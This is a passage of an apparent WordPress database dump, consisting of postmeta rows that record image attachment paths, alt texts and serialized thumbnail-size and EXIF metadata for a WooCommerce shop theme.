"file\";s:24:\"h1-iwt-img-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h1-iwt-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168,2992,'_wp_attachment_image_alt','a'),(169,3415,'_wp_attachment_image_alt','a'),(170,3446,'_wp_attached_file','2018/02/landing-footer-img1.png'),(171,3446,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:317;s:6:\"height\";i:365;s:4:\"file\";s:31:\"2018/02/landing-footer-img1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-footer-img1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-footer-img1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-footer-img1-261x300.png\";s:5:\"width\";i:261;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-footer-img1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-footer-img1-317x300.png\";s:5:\"width\";i:317;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-footer-img1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-footer-img1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-footer-img1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(172,3007,'_wp_attached_file','2018/02/footer-lazni.png'),(173,3007,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:354;s:6:\"height\";i:57;s:4:\"file\";s:24:\"2018/02/footer-lazni.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"footer-lazni-300x57.png\";s:5:\"width\";i:300;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"footer-lazni-100x57.png\";s:5:\"width\";i:100;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"footer-lazni-300x48.png\";s:5:\"width\";i:300;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"footer-lazni-150x57.png\";s:5:\"width\";i:150;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"footer-lazni-300x57.png\";s:5:\"width\";i:300;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"footer-lazni-300x57.png\";s:5:\"width\";i:300;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"footer-lazni-100x57.png\";s:5:\"width\";i:100;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174,643,'_wp_attachment_image_alt','o'),(175,1456,'_wp_attachment_image_alt','a'),(176,3007,'_wp_attachment_image_alt','o'),(177,644,'_wp_attached_file','2018/01/h10-slide5-graphic1.jpg'),(178,644,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1101;s:4:\"file\";s:31:\"2018/01/h10-slide5-graphic1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide5-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h10-slide5-graphic1-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h10-slide5-graphic1-1536x881.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:881;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h10-slide5-graphic1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h10-slide5-graphic1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h10-slide5-graphic1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide5-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide5-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179,3061,'_wp_attached_file','2018/02/me-small-square-with-hello.jpg'),(180,3061,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:38:\"2018/02/me-small-square-with-hello.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"me-small-square-with-hello-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:38:\"me-small-square-with-hello-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"me-small-square-with-hello-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552890318\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(181,1124,'_wp_attachment_image_alt','a'),(182,4049,'_wp_attachment_image_alt','j'),(183,3061,'_wp_attachment_image_alt','a'),(184,3446,'_wp_attachment_image_alt','o'),(185,644,'_wp_attachment_image_alt','o'),(186,1457,'_wp_attached_file','2018/01/big-gallery-img-2.jpg'),(187,1457,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1306;s:6:\"height\";i:867;s:4:\"file\";s:29:\"2018/01/big-gallery-img-2.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"big-gallery-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-2-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-2-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"big-gallery-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188,1125,'_wp_attached_file','2018/01/product10-gallery2.jpg'),(189,1125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product10-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product10-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product10-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190,2027,'_wp_attached_file','2018/02/h7-img-22.png'),(191,2027,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:208;s:4:\"file\";s:21:\"2018/02/h7-img-22.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-22-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-22-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-22-300x122.png\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-22-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-22-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-22-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-22-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192,645,'_wp_attached_file','2018/01/h3-img6.png'),(193,645,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:197;s:6:\"height\";i:373;s:4:\"file\";s:19:\"2018/01/h3-img6.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h3-img6-197x300.png\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h3-img6-158x300.png\";s:5:\"width\";i:158;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"h3-img6-197x300.png\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h3-img6-197x240.png\";s:5:\"width\";i:197;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h3-img6-197x300.png\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194,4076,'_wp_attached_file','2018/03/landing-background-leaves-4.jpg'),(195,4076,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:777;s:4:\"file\";s:39:\"2018/03/landing-background-leaves-4.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:39:\"landing-background-leaves-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-600x243.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:243;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-300x121.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:121;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-4-1024x414.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:414;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-768x311.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-4-1536x622.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:622;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-4-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-550x777.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:777;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-4-1100x777.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:777;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:39:\"landing-background-leaves-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-600x243.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:243;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-4-100x100.jpg\";s:5:\"width\";i:100;s